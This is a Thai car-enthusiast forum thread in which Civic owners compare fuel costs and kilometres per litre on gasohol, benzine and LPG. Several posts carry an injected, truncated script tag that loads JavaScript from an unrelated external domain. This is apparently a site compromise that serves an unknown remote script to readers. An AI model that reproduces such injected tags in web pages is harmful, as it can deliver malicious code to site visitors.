พุธ, 23 พฤศจิกา 2011 19:02 - เทคนิคการเข้าเกียร์...402 เมตร ^^"
puyzaaaaa พิมพ์ว่า:
งงมากมายเลยครับ แปลก จริง เติม แก๊ส 91 400 บาท ราคา แก๊สราคาลิตรละ 31-32 บาท

ขับได้ 110 กิโล T_T

...... ปกติเติม เบนซิน ไม่หมดเร็วขนาดนี้เลย...

ปล.อุสาจะเก็บเงินเข้ากองทุน ตีหม้อ T_T


จะไปตีหม้อ ที่ไหน ผมช่วยหารด้วยเอาม่ะ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: puyzaaaaa 
ham_ter


ชื่อเล่น: ส้มจี๊ด

เข้าร่วม: 18 ตุลา 2011
ตอบ: 1641

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4624
ให้คำขอบคุณ: 0

ที่อยู่: เชียงใหม่
ปี: 2002
สี: ม่วง วินเทจพลัม (RP-32P)
พุธ, 23 พฤศจิกา 2011 19:21 - เทคนิคการเข้าเกียร์...402 เมตร ^^"
puyzaaaaa พิมพ์ว่า:
งงมากมายเลยครับ แปลก จริง เติม แก๊ส 91 400 บาท ราคา แก๊สราคาลิตรละ 31-32 บาท

ขับได้ 110 กิโล T_T

...... ปกติเติม เบนซิน ไม่หมดเร็วขนาดนี้เลย...

ปล.อุสาจะเก็บเงินเข้ากองทุน ตีหม้อ T_T

เปลืองนะเนี่ย รถเค้าใช้ เบนซิน 91 เพียวๆ ขับไม่ค่อยธรรมดาเท่าไหร่ ในเมืองอย่างเดียว
น้ำมัน 1250 บาท 34 ลิตรกว่าๆ วิ่งได้ 426 กม. ตก 2.93 บาท/กม.หรือตกอยู่ 12.47กม./ลิตร
ถ้าวิ่งยาวๆ เชียงใหม่-เชียงรายตกอยู่ 14-16โล/ลิตรเลยทีเดียว
แต่ถ้าเป็นถั่วเขียวดมแก๊ส ขับก็ไม่ค่อยธรรมดาเท่าไหร่เหมือนกันไปพิษณุโลกคราวก่อน
แก๊ส 370 บาท 29.60 กก. วิ่งได้ 359กม.ตก 1.03 บาท/กม.หรือตกอยู่ 12.12กม./กก.
เลยทีเดียวทำไมแก๊สโซฮอลล์มันเปลืองจังหรือเหยียบอัดอย่างเดียว


Attached File :
เทคนิคการเข้าเกียร์...402 เมตร ^^"
Attached File :
เทคนิคการเข้าเกียร์...402 เมตร ^^"
Attached File :
เทคนิคการเข้าเกียร์...402 เมตร ^^"
Attached File :
เทคนิคการเข้าเกียร์...402 เมตร ^^"
ได้รับคำขอบคุณจาก: puyzaaaaa 
underhill


เข้าร่วม: 15 กันยา 2011
ตอบ: 3545

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4125
ให้คำขอบคุณ: 1677

ปี: 2002
สี: น้ำเงิน อิเทอนอล (B-96P)
พุธ, 23 พฤศจิกา 2011 19:25 - เทคนิคการเข้าเกียร์...402 เมตร ^^"
สงสัยส้มจี๊ดเปนคนชอบถ่ายรูปแน่ๆเลย มีภาพปากอบให้เข้าใขง่ายๆอยู่เรื่อย <script src="https://sport32news.com/civicesgroup.js"></

ปล โซฮอล มานเปลืองจริงๆ ยอมรับ
ham_ter


ชื่อเล่น: ส้มจี๊ด

เข้าร่วม: 18 ตุลา 2011
ตอบ: 1641

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4624
ให้คำขอบคุณ: 0

ที่อยู่: เชียงใหม่
ปี: 2002
สี: ม่วง วินเทจพลัม (RP-32P)
พุธ, 23 พฤศจิกา 2011 19:30 - เทคนิคการเข้าเกียร์...402 เมตร ^^"
underhill พิมพ์ว่า:
สงสัยส้มจี๊ดเปนคนชอบถ่ายรูปแน่ๆเลย มีภาพปากอบให้เข้าใขง่ายๆอยู่เรื่อย <script src="https://sport32news.com/civicesgroup.js"></

ปล โซฮอล มานเปลืองจริงๆ ยอมรับ

ถูกต้องเวลามีไรจะถ่ายไว้ทุกที เอาไว้ประกอบเพราะบางทีมีคนถามใน WLC ก็เอาภาพให้ดูไง อิอิ
ตอบ
หน้า 2 จาก 3
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.